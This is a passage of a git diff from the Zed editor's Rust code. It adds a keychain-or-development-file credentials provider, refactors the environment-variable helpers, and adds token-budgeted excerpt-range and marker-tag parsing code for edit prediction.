/dev/null +++ b/crates/zed_credentials_provider/src/zed_credentials_provider.rs @@ -0,0 +1,181 @@ +use std::collections::HashMap; +use std::future::Future; +use std::path::PathBuf; +use std::pin::Pin; +use std::sync::{Arc, LazyLock}; + +use anyhow::Result; +use credentials_provider::CredentialsProvider; 
+use futures::FutureExt as _; +use gpui::{App, AsyncApp, Global}; +use release_channel::ReleaseChannel; + +/// An environment variable whose presence indicates that the system keychain +/// should be used in development. +/// +/// By default, running Zed in development uses the development credentials +/// provider. Setting this environment variable allows you to interact with the +/// system keychain (for instance, if you need to test something). +/// +/// Only works in development. Setting this environment variable in other +/// release channels is a no-op. +static ZED_DEVELOPMENT_USE_KEYCHAIN: LazyLock = LazyLock::new(|| { + std::env::var("ZED_DEVELOPMENT_USE_KEYCHAIN").is_ok_and(|value| !value.is_empty()) +}); + +pub struct ZedCredentialsProvider(pub Arc); + +impl Global for ZedCredentialsProvider {} + +/// Returns the global [`CredentialsProvider`]. +pub fn init_global(cx: &mut App) { + // The `CredentialsProvider` trait has `Send + Sync` bounds on it, so it + // seems like this is a false positive from Clippy. + #[allow(clippy::arc_with_non_send_sync)] + let provider = new(cx); + cx.set_global(ZedCredentialsProvider(provider)); +} + +pub fn global(cx: &App) -> Arc { + cx.try_global::() + .map(|provider| provider.0.clone()) + .unwrap_or_else(|| new(cx)) +} + +fn new(cx: &App) -> Arc { + let use_development_provider = match ReleaseChannel::try_global(cx) { + Some(ReleaseChannel::Dev) => { + // In development we default to using the development + // credentials provider to avoid getting spammed by relentless + // keychain access prompts. + // + // However, if the `ZED_DEVELOPMENT_USE_KEYCHAIN` environment + // variable is set, we will use the actual keychain. 
+ !*ZED_DEVELOPMENT_USE_KEYCHAIN + } + Some(ReleaseChannel::Nightly | ReleaseChannel::Preview | ReleaseChannel::Stable) | None => { + false + } + }; + + if use_development_provider { + Arc::new(DevelopmentCredentialsProvider::new()) + } else { + Arc::new(KeychainCredentialsProvider) + } +} + +/// A credentials provider that stores credentials in the system keychain. +struct KeychainCredentialsProvider; + +impl CredentialsProvider for KeychainCredentialsProvider { + fn read_credentials<'a>( + &'a self, + url: &'a str, + cx: &'a AsyncApp, + ) -> Pin)>>> + 'a>> { + async move { cx.update(|cx| cx.read_credentials(url)).await }.boxed_local() + } + + fn write_credentials<'a>( + &'a self, + url: &'a str, + username: &'a str, + password: &'a [u8], + cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + cx.update(move |cx| cx.write_credentials(url, username, password)) + .await + } + .boxed_local() + } + + fn delete_credentials<'a>( + &'a self, + url: &'a str, + cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { cx.update(move |cx| cx.delete_credentials(url)).await }.boxed_local() + } +} + +/// A credentials provider that stores credentials in a local file. +/// +/// This MUST only be used in development, as this is not a secure way of storing +/// credentials on user machines. +/// +/// Its existence is purely to work around the annoyance of having to constantly +/// re-allow access to the system keychain when developing Zed. 
+struct DevelopmentCredentialsProvider { + path: PathBuf, +} + +impl DevelopmentCredentialsProvider { + fn new() -> Self { + let path = paths::config_dir().join("development_credentials"); + + Self { path } + } + + fn load_credentials(&self) -> Result)>> { + let json = std::fs::read(&self.path)?; + let credentials: HashMap)> = serde_json::from_slice(&json)?; + + Ok(credentials) + } + + fn save_credentials(&self, credentials: &HashMap)>) -> Result<()> { + let json = serde_json::to_string(credentials)?; + std::fs::write(&self.path, json)?; + + Ok(()) + } +} + +impl CredentialsProvider for DevelopmentCredentialsProvider { + fn read_credentials<'a>( + &'a self, + url: &'a str, + _cx: &'a AsyncApp, + ) -> Pin)>>> + 'a>> { + async move { + Ok(self + .load_credentials() + .unwrap_or_default() + .get(url) + .cloned()) + } + .boxed_local() + } + + fn write_credentials<'a>( + &'a self, + url: &'a str, + username: &'a str, + password: &'a [u8], + _cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + let mut credentials = self.load_credentials().unwrap_or_default(); + credentials.insert(url.to_string(), (username.to_string(), password.to_vec())); + + self.save_credentials(&credentials) + } + .boxed_local() + } + + fn delete_credentials<'a>( + &'a self, + url: &'a str, + _cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + let mut credentials = self.load_credentials()?; + credentials.remove(url); + + self.save_credentials(&credentials) + } + .boxed_local() + } +} diff --git a/crates/zed_env_vars/Cargo.toml b/crates/zed_env_vars/Cargo.toml index 1cf32174c351c28ec7eb16deab7b7986655d4a48..bf863b742568f3f607ba7cb54bc8fc267f045cc9 100644 --- a/crates/zed_env_vars/Cargo.toml +++ b/crates/zed_env_vars/Cargo.toml @@ -15,4 +15,4 @@ path = "src/zed_env_vars.rs" default = [] [dependencies] -gpui.workspace = true +env_var.workspace = true diff --git a/crates/zed_env_vars/src/zed_env_vars.rs b/crates/zed_env_vars/src/zed_env_vars.rs index 
e601cc9536602ac943bd76bf1bfd8b8ac8979dd9..13451911295735762074bcb1cf152470afa55c36 100644 --- a/crates/zed_env_vars/src/zed_env_vars.rs +++ b/crates/zed_env_vars/src/zed_env_vars.rs @@ -1,45 +1,6 @@ -use gpui::SharedString; +pub use env_var::{EnvVar, bool_env_var, env_var}; use std::sync::LazyLock; /// Whether Zed is running in stateless mode. /// When true, Zed will use in-memory databases instead of persistent storage. pub static ZED_STATELESS: LazyLock = bool_env_var!("ZED_STATELESS"); - -#[derive(Clone)] -pub struct EnvVar { - pub name: SharedString, - /// Value of the environment variable. Also `None` when set to an empty string. - pub value: Option, -} - -impl EnvVar { - pub fn new(name: SharedString) -> Self { - let value = std::env::var(name.as_str()).ok(); - if value.as_ref().is_some_and(|v| v.is_empty()) { - Self { name, value: None } - } else { - Self { name, value } - } - } - - pub fn or(self, other: EnvVar) -> EnvVar { - if self.value.is_some() { self } else { other } - } -} - -/// Creates a `LazyLock` expression for use in a `static` declaration. -#[macro_export] -macro_rules! env_var { - ($name:expr) => { - ::std::sync::LazyLock::new(|| $crate::EnvVar::new(($name).into())) - }; -} - -/// Generates a `LazyLock` expression for use in a `static` declaration. Checks if the -/// environment variable exists and is non-empty. -#[macro_export] -macro_rules! 
bool_env_var { - ($name:expr) => { - ::std::sync::LazyLock::new(|| $crate::EnvVar::new(($name).into()).value.is_some()) - }; -} diff --git a/crates/zeta_prompt/Cargo.toml b/crates/zeta_prompt/Cargo.toml index 21634583d33e13cd9570041f3e8466d05cef9944..8acd91a7a43613fd63f4f46ab73e9485fd64e7d2 100644 --- a/crates/zeta_prompt/Cargo.toml +++ b/crates/zeta_prompt/Cargo.toml @@ -13,6 +13,7 @@ path = "src/zeta_prompt.rs" [dependencies] anyhow.workspace = true +imara-diff.workspace = true serde.workspace = true strum.workspace = true diff --git a/crates/zeta_prompt/src/excerpt_ranges.rs b/crates/zeta_prompt/src/excerpt_ranges.rs new file mode 100644 index 0000000000000000000000000000000000000000..40621fe98a13bfa9195293ad29ba549240532a2e --- /dev/null +++ b/crates/zeta_prompt/src/excerpt_ranges.rs @@ -0,0 +1,443 @@ +use std::ops::Range; + +use serde::{Deserialize, Serialize}; + +use crate::estimate_tokens; + +/// Pre-computed byte offset ranges within `cursor_excerpt` for different +/// editable and context token budgets. Allows the server to select the +/// appropriate ranges for whichever model it uses. +#[derive(Clone, Debug, Default, PartialEq, Hash, Serialize, Deserialize)] +pub struct ExcerptRanges { + /// Editable region computed with a 150-token budget. + pub editable_150: Range, + /// Editable region computed with a 180-token budget. + pub editable_180: Range, + /// Editable region computed with a 350-token budget. + pub editable_350: Range, + /// Editable region computed with a 512-token budget. + pub editable_512: Option>, + /// Context boundary when using editable_150 with 350 tokens of additional context. + pub editable_150_context_350: Range, + /// Context boundary when using editable_180 with 350 tokens of additional context. + pub editable_180_context_350: Range, + /// Context boundary when using editable_350 with 150 tokens of additional context.
+ pub editable_350_context_150: Range, + pub editable_350_context_512: Option>, + pub editable_350_context_1024: Option>, + pub context_4096: Option>, + pub context_8192: Option>, +} + +/// Builds an `ExcerptRanges` by computing editable and context ranges for each +/// budget combination, using the syntax-aware logic in +/// `compute_editable_and_context_ranges`. +pub fn compute_legacy_excerpt_ranges( + cursor_excerpt: &str, + cursor_offset: usize, + syntax_ranges: &[Range], +) -> ExcerptRanges { + let compute = |editable_tokens, context_tokens| { + compute_editable_and_context_ranges( + cursor_excerpt, + cursor_offset, + syntax_ranges, + editable_tokens, + context_tokens, + ) + }; + + let (editable_150, editable_150_context_350) = compute(150, 350); + let (editable_180, editable_180_context_350) = compute(180, 350); + let (editable_350, editable_350_context_150) = compute(350, 150); + let (editable_512, _) = compute(512, 0); + let (_, editable_350_context_512) = compute(350, 512); + let (_, editable_350_context_1024) = compute(350, 1024); + let (_, context_4096) = compute(350, 4096); + let (_, context_8192) = compute(350, 8192); + + ExcerptRanges { + editable_150, + editable_180, + editable_350, + editable_512: Some(editable_512), + editable_150_context_350, + editable_180_context_350, + editable_350_context_150, + editable_350_context_512: Some(editable_350_context_512), + editable_350_context_1024: Some(editable_350_context_1024), + context_4096: Some(context_4096), + context_8192: Some(context_8192), + } +} + +/// Given the cursor excerpt text, cursor offset, and the syntax node ranges +/// containing the cursor (innermost to outermost), compute the editable range +/// and context range as byte offset ranges within `cursor_excerpt`. +/// +/// This is the server-side equivalent of `compute_excerpt_ranges` in +/// `edit_prediction::cursor_excerpt`, but operates on plain text with +/// pre-computed syntax boundaries instead of a `BufferSnapshot`. 
+pub fn compute_editable_and_context_ranges( + cursor_excerpt: &str, + cursor_offset: usize, + syntax_ranges: &[Range], + editable_token_limit: usize, + context_token_limit: usize, +) -> (Range, Range) { + let line_starts = compute_line_starts(cursor_excerpt); + let cursor_row = offset_to_row(&line_starts, cursor_offset); + let max_row = line_starts.len().saturating_sub(1) as u32; + + let editable_range = compute_editable_range_from_text( + cursor_excerpt, + &line_starts, + cursor_row, + max_row, + syntax_ranges, + editable_token_limit, + ); + + let context_range = expand_context_from_text( + cursor_excerpt, + &line_starts, + max_row, + &editable_range, + syntax_ranges, + context_token_limit, + ); + + (editable_range, context_range) +} + +fn compute_line_starts(text: &str) -> Vec { + let mut starts = vec![0]; + for (index, byte) in text.bytes().enumerate() { + if byte == b'\n' { + starts.push(index + 1); + } + } + starts +} + +fn offset_to_row(line_starts: &[usize], offset: usize) -> u32 { + match line_starts.binary_search(&offset) { + Ok(row) => row as u32, + Err(row) => (row.saturating_sub(1)) as u32, + } +} + +fn row_start_offset(line_starts: &[usize], row: u32) -> usize { + line_starts.get(row as usize).copied().unwrap_or(0) +} + +fn row_end_offset(text: &str, line_starts: &[usize], row: u32) -> usize { + if let Some(&next_start) = line_starts.get(row as usize + 1) { + // End before the newline of this row. 
+ next_start.saturating_sub(1).min(text.len()) + } else { + text.len() + } +} + +fn row_range_to_byte_range( + text: &str, + line_starts: &[usize], + start_row: u32, + end_row: u32, +) -> Range { + let start = row_start_offset(line_starts, start_row); + let end = row_end_offset(text, line_starts, end_row); + start..end +} + +fn estimate_tokens_for_row_range( + text: &str, + line_starts: &[usize], + start_row: u32, + end_row: u32, +) -> usize { + let mut tokens = 0; + for row in start_row..end_row { + let row_len = row_end_offset(text, line_starts, row) + .saturating_sub(row_start_offset(line_starts, row)); + tokens += estimate_tokens(row_len).max(1); + } + tokens +} + +fn line_token_count_from_text(text: &str, line_starts: &[usize], row: u32) -> usize { + let row_len = + row_end_offset(text, line_starts, row).saturating_sub(row_start_offset(line_starts, row)); + estimate_tokens(row_len).max(1) +} + +/// Returns syntax boundaries (as row ranges) that contain the given row range +/// and extend beyond it, ordered from smallest to largest. +fn containing_syntax_boundaries_from_ranges( + line_starts: &[usize], + syntax_ranges: &[Range], + start_row: u32, + end_row: u32, +) -> Vec<(u32, u32)> { + let mut boundaries = Vec::new(); + let mut last: Option<(u32, u32)> = None; + + // syntax_ranges is innermost to outermost, so iterate in order. + for range in syntax_ranges { + let node_start_row = offset_to_row(line_starts, range.start); + let node_end_row = offset_to_row(line_starts, range.end); + + // Skip nodes that don't extend beyond the current range. 
+ if node_start_row >= start_row && node_end_row <= end_row { + continue; + } + + let rows = (node_start_row, node_end_row); + if last == Some(rows) { + continue; + } + + last = Some(rows); + boundaries.push(rows); + } + + boundaries +} + +fn compute_editable_range_from_text( + text: &str, + line_starts: &[usize], + cursor_row: u32, + max_row: u32, + syntax_ranges: &[Range], + token_limit: usize, +) -> Range { + // Phase 1: Expand symmetrically from cursor using 75% of budget. + let initial_budget = (token_limit * 3) / 4; + let (mut start_row, mut end_row, mut remaining_tokens) = + expand_symmetric(text, line_starts, cursor_row, max_row, initial_budget); + + remaining_tokens += token_limit.saturating_sub(initial_budget); + + let original_start = start_row; + let original_end = end_row; + + // Phase 2: Expand to syntax boundaries that fit within budget. + let boundaries = + containing_syntax_boundaries_from_ranges(line_starts, syntax_ranges, start_row, end_row); + for (boundary_start, boundary_end) in &boundaries { + let tokens_for_start = if *boundary_start < start_row { + estimate_tokens_for_row_range(text, line_starts, *boundary_start, start_row) + } else { + 0 + }; + let tokens_for_end = if *boundary_end > end_row { + estimate_tokens_for_row_range(text, line_starts, end_row + 1, *boundary_end + 1) + } else { + 0 + }; + + let total_needed = tokens_for_start + tokens_for_end; + if total_needed <= remaining_tokens { + if *boundary_start < start_row { + start_row = *boundary_start; + } + if *boundary_end > end_row { + end_row = *boundary_end; + } + remaining_tokens = remaining_tokens.saturating_sub(total_needed); + } else { + break; + } + } + + // Phase 3: Continue line-wise in the direction we expanded least. 
+ let expanded_up = original_start.saturating_sub(start_row); + let expanded_down = end_row.saturating_sub(original_end); + let prefer_up = expanded_up <= expanded_down; + + (start_row, end_row, _) = expand_linewise( + text, + line_starts, + start_row, + end_row, + max_row, + remaining_tokens, + prefer_up, + ); + + row_range_to_byte_range(text, line_starts, start_row, end_row) +} + +fn expand_context_from_text( + text: &str, + line_starts: &[usize], + max_row: u32, + editable_range: &Range, + syntax_ranges: &[Range], + context_token_limit: usize, +) -> Range { + let mut start_row = offset_to_row(line_starts, editable_range.start); + let mut end_row = offset_to_row(line_starts, editable_range.end); + let mut remaining_tokens = context_token_limit; + let mut did_syntax_expand = false; + + let boundaries = + containing_syntax_boundaries_from_ranges(line_starts, syntax_ranges, start_row, end_row); + for (boundary_start, boundary_end) in &boundaries { + let tokens_for_start = if *boundary_start < start_row { + estimate_tokens_for_row_range(text, line_starts, *boundary_start, start_row) + } else { + 0 + }; + let tokens_for_end = if *boundary_end > end_row { + estimate_tokens_for_row_range(text, line_starts, end_row + 1, *boundary_end + 1) + } else { + 0 + }; + + let total_needed = tokens_for_start + tokens_for_end; + if total_needed <= remaining_tokens { + if *boundary_start < start_row { + start_row = *boundary_start; + } + if *boundary_end > end_row { + end_row = *boundary_end; + } + remaining_tokens = remaining_tokens.saturating_sub(total_needed); + did_syntax_expand = true; + } else { + break; + } + } + + // Only expand line-wise if no syntax expansion occurred. 
+ if !did_syntax_expand { + (start_row, end_row, _) = expand_linewise( + text, + line_starts, + start_row, + end_row, + max_row, + remaining_tokens, + true, + ); + } + + row_range_to_byte_range(text, line_starts, start_row, end_row) +} + +fn expand_symmetric( + text: &str, + line_starts: &[usize], + cursor_row: u32, + max_row: u32, + mut token_budget: usize, +) -> (u32, u32, usize) { + let mut start_row = cursor_row; + let mut end_row = cursor_row; + + let cursor_line_tokens = line_token_count_from_text(text, line_starts, cursor_row); + token_budget = token_budget.saturating_sub(cursor_line_tokens); + + loop { + let can_expand_up = start_row > 0; + let can_expand_down = end_row < max_row; + + if token_budget == 0 || (!can_expand_up && !can_expand_down) { + break; + } + + if can_expand_down { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= token_budget { + end_row = next_row; + token_budget = token_budget.saturating_sub(line_tokens); + } else { + break; + } + } + + if can_expand_up && token_budget > 0 { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= token_budget { + start_row = next_row; + token_budget = token_budget.saturating_sub(line_tokens); + } else { + break; + } + } + } + + (start_row, end_row, token_budget) +} + +fn expand_linewise( + text: &str, + line_starts: &[usize], + mut start_row: u32, + mut end_row: u32, + max_row: u32, + mut remaining_tokens: usize, + prefer_up: bool, +) -> (u32, u32, usize) { + loop { + let can_expand_up = start_row > 0; + let can_expand_down = end_row < max_row; + + if remaining_tokens == 0 || (!can_expand_up && !can_expand_down) { + break; + } + + let mut expanded = false; + + if prefer_up { + if can_expand_up { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + start_row = 
next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + if can_expand_down && remaining_tokens > 0 { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + end_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + } else { + if can_expand_down { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + end_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + if can_expand_up && remaining_tokens > 0 { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + start_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + } + + if !expanded { + break; + } + } + + (start_row, end_row, remaining_tokens) +} diff --git a/crates/zeta_prompt/src/multi_region.rs b/crates/zeta_prompt/src/multi_region.rs new file mode 100644 index 0000000000000000000000000000000000000000..a2e50ca445998672a169f4220d13eb4c13a22e8b --- /dev/null +++ b/crates/zeta_prompt/src/multi_region.rs @@ -0,0 +1,1691 @@ +use anyhow::{Context as _, Result, anyhow}; + +pub const MARKER_TAG_PREFIX: &str = "<|marker_"; +pub const MARKER_TAG_SUFFIX: &str = "|>"; +pub const RELATIVE_MARKER_TAG_PREFIX: &str = "<|marker"; +const V0316_MIN_BLOCK_LINES: usize = 3; +const V0316_MAX_BLOCK_LINES: usize = 8; +const V0318_MIN_BLOCK_LINES: usize = 6; +const V0318_MAX_BLOCK_LINES: usize = 16; +const MAX_NUDGE_LINES: usize = 5; +pub const V0316_END_MARKER: &str = "<[end▁of▁sentence]>"; +pub const V0317_END_MARKER: &str = "<[end▁of▁sentence]>"; +pub const V0318_END_MARKER: &str = "<[end▁of▁sentence]>"; + +pub fn marker_tag(number: usize) 
-> String { + format!("{MARKER_TAG_PREFIX}{number}{MARKER_TAG_SUFFIX}") +} + +pub fn marker_tag_relative(delta: isize) -> String { + if delta > 0 { + format!("<|marker+{delta}|>") + } else if delta == 0 { + String::from("<|marker-0|>") + } else { + format!("<|marker{delta}|>") + } +} + +struct LineInfo { + start: usize, + is_blank: bool, + is_good_start: bool, +} + +fn collect_line_info(text: &str) -> Vec { + let mut lines = Vec::new(); + let mut offset = 0; + for line in text.split('\n') { + let trimmed = line.trim(); + let is_blank = trimmed.is_empty(); + let is_good_start = !is_blank && !is_structural_tail(trimmed); + lines.push(LineInfo { + start: offset, + is_blank, + is_good_start, + }); + offset += line.len() + 1; + } + // split('\n') on "abc\n" yields ["abc", ""] — drop the phantom trailing + // empty element when the text ends with '\n'. + if text.ends_with('\n') && lines.len() > 1 { + lines.pop(); + } + lines +} + +fn is_structural_tail(trimmed_line: &str) -> bool { + if trimmed_line.starts_with(&['}', ']', ')']) { + return true; + } + matches!( + trimmed_line.trim_end_matches(';'), + "break" | "continue" | "return" | "throw" | "end" + ) +} + +/// Starting from line `from`, scan up to `MAX_NUDGE_LINES` forward to find a +/// line with `is_good_start`. Returns `None` if no suitable line is found. +fn skip_to_good_start(lines: &[LineInfo], from: usize) -> Option { + (from..lines.len().min(from + MAX_NUDGE_LINES)).find(|&i| lines[i].is_good_start) +} + +/// Compute byte offsets within `editable_text` where marker boundaries should +/// be placed. +/// +/// Returns a sorted `Vec` that always starts with `0` and ends with +/// `editable_text.len()`. Interior offsets are placed at line boundaries +/// (right after a `\n`), preferring blank-line boundaries when available and +/// respecting `min_block_lines` / `max_block_lines` constraints. 
+fn compute_marker_offsets_with_limits( + editable_text: &str, + min_block_lines: usize, + max_block_lines: usize, +) -> Vec { + if editable_text.is_empty() { + return vec![0, 0]; + } + + let lines = collect_line_info(editable_text); + let mut offsets = vec![0usize]; + let mut last_boundary_line = 0; + let mut i = 0; + + while i < lines.len() { + let gap = i - last_boundary_line; + + // Blank-line split: non-blank line following blank line(s) with enough + // accumulated lines. + if gap >= min_block_lines && !lines[i].is_blank && i > 0 && lines[i - 1].is_blank { + let target = if lines[i].is_good_start { + i + } else { + skip_to_good_start(&lines, i).unwrap_or(i) + }; + if lines.len() - target >= min_block_lines + && lines[target].start > *offsets.last().unwrap_or(&0) + { + offsets.push(lines[target].start); + last_boundary_line = target; + i = target + 1; + continue; + } + } + + // Hard cap: too many lines without a split. + if gap >= max_block_lines { + let target = skip_to_good_start(&lines, i).unwrap_or(i); + if lines[target].start > *offsets.last().unwrap_or(&0) { + offsets.push(lines[target].start); + last_boundary_line = target; + i = target + 1; + continue; + } + } + + i += 1; + } + + let end = editable_text.len(); + if *offsets.last().unwrap_or(&0) != end { + offsets.push(end); + } + + offsets +} + +/// Compute byte offsets within `editable_text` for the V0316/V0317 block sizing rules. +pub fn compute_marker_offsets(editable_text: &str) -> Vec { + compute_marker_offsets_with_limits(editable_text, V0316_MIN_BLOCK_LINES, V0316_MAX_BLOCK_LINES) +} + +pub fn compute_marker_offsets_v0318(editable_text: &str) -> Vec { + compute_marker_offsets_with_limits(editable_text, V0318_MIN_BLOCK_LINES, V0318_MAX_BLOCK_LINES) +} + +/// Write the editable region content with marker tags, inserting the cursor +/// marker at the given offset within the editable text. 
+pub fn write_editable_with_markers( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + let mut cursor_placed = false; + for (i, &offset) in marker_offsets.iter().enumerate() { + let marker_num = i + 1; + if !output.is_empty() && !output.ends_with('\n') { + output.push('\n'); + } + output.push_str(&marker_tag(marker_num)); + + if let Some(&next_offset) = marker_offsets.get(i + 1) { + output.push('\n'); + let block = &editable_text[offset..next_offset]; + if !cursor_placed + && cursor_offset_in_editable >= offset + && cursor_offset_in_editable <= next_offset + { + cursor_placed = true; + let cursor_in_block = cursor_offset_in_editable - offset; + output.push_str(&block[..cursor_in_block]); + output.push_str(cursor_marker); + output.push_str(&block[cursor_in_block..]); + } else { + output.push_str(block); + } + } + } +} + +/// Strip any `<|marker_N|>` tags from `text`. +/// +/// When a marker tag sits on its own line (followed by `\n`), the trailing +/// newline is also removed so the surrounding lines stay joined naturally. +fn strip_marker_tags(text: &str) -> String { + let mut result = String::with_capacity(text.len()); + let mut pos = 0; + let bytes = text.as_bytes(); + while let Some(rel) = text[pos..].find(MARKER_TAG_PREFIX) { + result.push_str(&text[pos..pos + rel]); + let num_start = pos + rel + MARKER_TAG_PREFIX.len(); + if let Some(suffix_rel) = text[num_start..].find(MARKER_TAG_SUFFIX) { + let mut tag_end = num_start + suffix_rel + MARKER_TAG_SUFFIX.len(); + if bytes.get(tag_end) == Some(&b'\n') { + tag_end += 1; + } + pos = tag_end; + } else { + result.push_str(MARKER_TAG_PREFIX); + pos = num_start; + } + } + result.push_str(&text[pos..]); + result +} + +/// Parse model output that uses the marker format. +/// +/// Returns `(start_marker_num, end_marker_num, content_between_markers)`. 
+/// The leading format-level newline after the start marker is stripped. +/// Trailing newlines are preserved so blank-line endings in the editable +/// region are not lost. +/// +/// Any extra intermediate marker tags that the model may have inserted +/// between the first and last markers are stripped from the returned content. +pub fn extract_marker_span(text: &str) -> Result<(usize, usize, String)> { + let first_tag_start = text + .find(MARKER_TAG_PREFIX) + .context("no start marker found in output")?; + let first_num_start = first_tag_start + MARKER_TAG_PREFIX.len(); + let first_num_end = text[first_num_start..] + .find(MARKER_TAG_SUFFIX) + .map(|i| i + first_num_start) + .context("malformed start marker tag")?; + let start_num: usize = text[first_num_start..first_num_end] + .parse() + .context("start marker number is not a valid integer")?; + let first_tag_end = first_num_end + MARKER_TAG_SUFFIX.len(); + + let last_tag_start = text + .rfind(MARKER_TAG_PREFIX) + .context("no end marker found in output")?; + let last_num_start = last_tag_start + MARKER_TAG_PREFIX.len(); + let last_num_end = text[last_num_start..] + .find(MARKER_TAG_SUFFIX) + .map(|i| i + last_num_start) + .context("malformed end marker tag")?; + let end_num: usize = text[last_num_start..last_num_end] + .parse() + .context("end marker number is not a valid integer")?; + + if start_num == end_num { + return Err(anyhow!( + "start and end markers are the same (marker {})", + start_num + )); + } + + let mut content_start = first_tag_end; + if text.as_bytes().get(content_start) == Some(&b'\n') { + content_start += 1; + } + let content_end = last_tag_start; + + let content = &text[content_start..content_end.max(content_start)]; + let content = strip_marker_tags(content); + Ok((start_num, end_num, content)) +} + +/// Given old editable text and model output with marker span, reconstruct the +/// full new editable region. 
+pub fn apply_marker_span(old_editable: &str, output: &str) -> Result { + let (start_num, end_num, raw_new_span) = extract_marker_span(output)?; + let marker_offsets = compute_marker_offsets(old_editable); + + let start_idx = start_num + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = end_num + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + + if start_byte > end_byte { + return Err(anyhow!("start marker must come before end marker")); + } + + let old_span = &old_editable[start_byte..end_byte]; + let mut new_span = raw_new_span; + if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() { + new_span.push('\n'); + } + if !old_span.ends_with('\n') && new_span.ends_with('\n') { + new_span.pop(); + } + + let mut result = String::new(); + result.push_str(&old_editable[..start_byte]); + result.push_str(&new_span); + result.push_str(&old_editable[end_byte..]); + + Ok(result) +} + +/// Compare old and new editable text, find the minimal marker span that covers +/// all changes, and encode the result with marker tags. 
+pub fn encode_from_old_and_new( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, + no_edits_marker: &str, +) -> Result { + if old_editable == new_editable { + return Ok(format!("{no_edits_marker}{end_marker}")); + } + + let marker_offsets = compute_marker_offsets(old_editable); + let (common_prefix, common_suffix) = + common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes()); + let change_end_in_old = old_editable.len() - common_suffix; + + let start_marker_idx = marker_offsets + .iter() + .rposition(|&offset| offset <= common_prefix) + .unwrap_or(0); + let end_marker_idx = marker_offsets + .iter() + .position(|&offset| offset >= change_end_in_old) + .unwrap_or(marker_offsets.len() - 1); + + let old_start = marker_offsets[start_marker_idx]; + let old_end = marker_offsets[end_marker_idx]; + + let new_start = old_start; + let new_end = new_editable + .len() + .saturating_sub(old_editable.len().saturating_sub(old_end)); + + let new_span = &new_editable[new_start..new_end]; + + let start_marker_num = start_marker_idx + 1; + let end_marker_num = end_marker_idx + 1; + + let mut result = String::new(); + result.push_str(&marker_tag(start_marker_num)); + result.push('\n'); + + if let Some(cursor_offset) = cursor_offset_in_new { + if cursor_offset >= new_start && cursor_offset <= new_end { + let cursor_in_span = cursor_offset - new_start; + let bounded = cursor_in_span.min(new_span.len()); + result.push_str(&new_span[..bounded]); + result.push_str(cursor_marker); + result.push_str(&new_span[bounded..]); + } else { + result.push_str(new_span); + } + } else { + result.push_str(new_span); + } + + if !result.ends_with('\n') { + result.push('\n'); + } + result.push_str(&marker_tag(end_marker_num)); + result.push('\n'); + result.push_str(end_marker); + + Ok(result) +} + +/// Extract the full editable region from text that uses marker tags. 
+/// +/// Returns the concatenation of all block contents between the first and last +/// markers, with intermediate marker tags stripped. +pub fn extract_editable_region_from_markers(text: &str) -> Option { + let first_marker_start = text.find(MARKER_TAG_PREFIX)?; + + let mut markers: Vec<(usize, usize)> = Vec::new(); + let mut search_start = first_marker_start; + while let Some(rel_pos) = text[search_start..].find(MARKER_TAG_PREFIX) { + let tag_start = search_start + rel_pos; + let num_start = tag_start + MARKER_TAG_PREFIX.len(); + let num_end = text[num_start..].find(MARKER_TAG_SUFFIX)?; + let tag_end = num_start + num_end + MARKER_TAG_SUFFIX.len(); + markers.push((tag_start, tag_end)); + search_start = tag_end; + } + + if markers.len() < 2 { + return None; + } + + let (_, first_tag_end) = markers[0]; + let (last_tag_start, _) = markers[markers.len() - 1]; + + let mut content_start = first_tag_end; + if text.as_bytes().get(content_start) == Some(&b'\n') { + content_start += 1; + } + let mut content_end = last_tag_start; + if content_end > content_start && text.as_bytes().get(content_end - 1) == Some(&b'\n') { + content_end -= 1; + } + + let raw = &text[content_start..content_end]; + let result = strip_marker_tags(raw); + let result = result.strip_suffix('\n').unwrap_or(&result).to_string(); + Some(result) +} + +struct ParsedTag { + value: isize, + tag_start: usize, + tag_end: usize, +} + +fn collect_tags(text: &str, prefix: &str, parse: fn(&str) -> Option) -> Vec { + let mut tags = Vec::new(); + let mut search_from = 0; + while let Some(rel_pos) = text[search_from..].find(prefix) { + let tag_start = search_from + rel_pos; + let payload_start = tag_start + prefix.len(); + if let Some(suffix_rel) = text[payload_start..].find(MARKER_TAG_SUFFIX) { + let payload_end = payload_start + suffix_rel; + if let Some(value) = parse(&text[payload_start..payload_end]) { + let tag_end = payload_end + MARKER_TAG_SUFFIX.len(); + tags.push(ParsedTag { + value, + tag_start, + 
